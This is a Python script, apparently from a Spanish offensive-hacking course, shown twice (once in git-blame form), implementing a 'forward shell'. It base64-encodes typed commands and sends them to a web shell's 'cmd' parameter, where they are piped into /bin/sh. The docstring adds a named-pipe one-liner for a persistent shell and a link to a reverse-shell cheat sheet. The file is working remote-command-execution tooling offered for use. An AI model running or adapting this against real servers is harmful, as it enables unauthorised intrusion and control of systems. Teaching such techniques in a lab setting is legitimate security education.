Curso-lenguaje-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py

#!/usr/bin/env python3
"""

Forward Shell

Comandos para reverse shell: 
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

mkfifo input; tail -f input | /bin/sh 2>&1 > output

"""

import requests
import signal
import sys

from termcolor import colored
from base64 import b64encode

def def_handler(sig, frame):

    print(colored("\n[!] Exiting...", "blue"))
    sys.exit(1)


signal.signal(signal.SIGINT, def_handler)

main_url = "http://localhost/index.php"


def run_command(command):

    command = b64encode(command.encode()).decode()

    data = {
        'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
    }

    r = requests.get(main_url, params=data)

    return r.text


if __name__ == '__main__':

    while True:

        command = input(colored("> ", "yellow"))
        output_command = run_command(command)

        print(output_command)
wip 2024-02-02 23:02:37 +01:00			`#!/usr/bin/env python3`
			`"""`

			`Forward Shell`

			`Comandos para reverse shell:`
			`https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet`

			`mkfifo input; tail -f input \| /bin/sh 2>&1 > output`

			`"""`

			`import requests`
			`import signal`
			`import sys`

			`from termcolor import colored`
			`from base64 import b64encode`

			`def def_handler(sig, frame):`

			`print(colored("\n[!] Exiting...", "blue"))`
			`sys.exit(1)`


			`signal.signal(signal.SIGINT, def_handler)`

			`main_url = "http://localhost/index.php"`


			`def run_command(command):`

			`command = b64encode(command.encode()).decode()`

			`data = {`
			`'cmd': 'echo "%s" \| base64 -d \| /bin/sh' % command`
			`}`

			`r = requests.get(main_url, params=data)`

			`return r.text`


			`if __name__ == '__main__':`

			`while True:`

			`command = input(colored("> ", "yellow"))`
			`output_command = run_command(command)`

			`print(output_command)`